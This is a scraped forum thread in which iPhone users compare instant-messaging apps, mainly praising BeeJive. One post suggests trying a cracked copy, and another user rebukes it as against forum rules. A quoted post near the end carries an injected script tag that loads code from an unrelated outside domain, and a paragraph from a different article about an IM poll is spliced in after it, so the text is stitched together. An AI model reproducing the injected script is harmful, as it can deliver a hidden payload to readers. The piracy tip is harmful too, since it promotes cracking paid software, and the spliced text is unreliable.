Page 2 of 2 FirstFirst 12

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: Best IM App

What's Jailbreak?
    Thanks

I am still working on trying BeeJive - so I hope it lives up to all the love you guys are giving it!

As for IM+ it was AIIGHT - nothing to shout about and definitely nothing worth paying for. I thought I would like it because it gives you an option to stay signed in even after the app is closed - but it would CONSTANTLY sign me out...

BeeJive is available cracked, so you can try it out without worrying that you will never see your $9.99 and if you like it - pay for the full version!

As you can tell, BEEJIVEIM is number one here so far, IM+ is an alternative because it does its job so so and there isnt anything else that clubbed into one package besides Beejive.

--If I Helped, Please Hit Thanks!--

iPhoneaholic
    Thanks

Beejive is the most polished, complete IM app for the iPhone and iPod touch and the most overpriced. It offers compatibility with AIM, Google Talk, ICQ, Jabber, MSN/Windows Live, MySpace, and Yahoo! messaging..So what else do you want.It is all in one.So,Beejive is simply the best.
    mod/edit links removed

Well guys you sold me. I just bought BeeJive. If it sucks, you're all dead. lol, but I trust you.
    iEat. iSleep. iPhone.

What's Jailbreak? thetoothfairy's Avatar
    Thanks
    Thanked 1,002 Times in 564 Posts

Quote Originally Posted by andypropaganda View Post
    Well guys you sold me. I just bought BeeJive. If it sucks, you're all dead. lol, but I trust you.
    And if we told the truth... you owe us!

Let me see in what ways he owes us.... hmmmmmm

Thanks

thank you guys ......
    You make me Feel right GIRL

Quote Originally Posted by CrzyBeautiful View Post

BeeJive is available cracked, so you can try it out without worrying that you will never see your $9.99 and if you like it - pay for the full version!
    The rules are available for free....try reading them.

Discussion of anything cracked/pirated/warez not permitted on this forum.

What's Jailbreak?
    Thanks

Quote Originally Posted by cpjr View Post
    The rules are available for free....try reading them.

Discussion of anything cracked/pirated/warez not permitted on this forum.
    Actually I DID read the rules, as I do for all the forums I am apart of. While I can say "thank you" for bringing it to my attention that is is not permitted on THIS forum, there was no need to be rude

I am curious to know what BeeJive supposedly does better than Astra, seeing as I am an Astra pro user. I was quick enough to get in to the 100 slot beta.

Quote Originally Posted by CrzyBeautiful View Post
    Actually I DID read the rules, as I do for all the forums I am apart of. While I can say "thank you" for bringing it to my attention that is is not permitted on THIS forum, there was no need to be rude
    Lol. So then you knew the rules and just chose to ignore them? No matter.

iPhone? More like MyPhone
    Thanks

Beejive...no doubt

Quote Originally Posted by andypropaganda View Post
    Hey everyone,
    I'm just curious as to what you guys all think the best IM app for the iPhone is. I've been jumping between AIM and Palringo lately.

My problem with AIM is that it doesn't have the landscape keyboard.

But I don't like Palringo because it doesn't have the proper groups and such from my AIM screen name, and a lot of the time it takes forever to sign into my AIM s/n.

So just let me know what you guys think! Thanks!<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    On Tuesday we asked for your favorite instant messaging applications, and over 550 comments later, we've culled it down to the most popular five. From web-based chat to desktop clients to tools that combine IM, email, and social networking, your nominations spanned a wide range of instant messaging applications. Let's take a closer look at the five most voted-for apps, and face them off against each other in a final showdown to crown the ultimate favorite.

Page 2 of 2 FirstFirst 12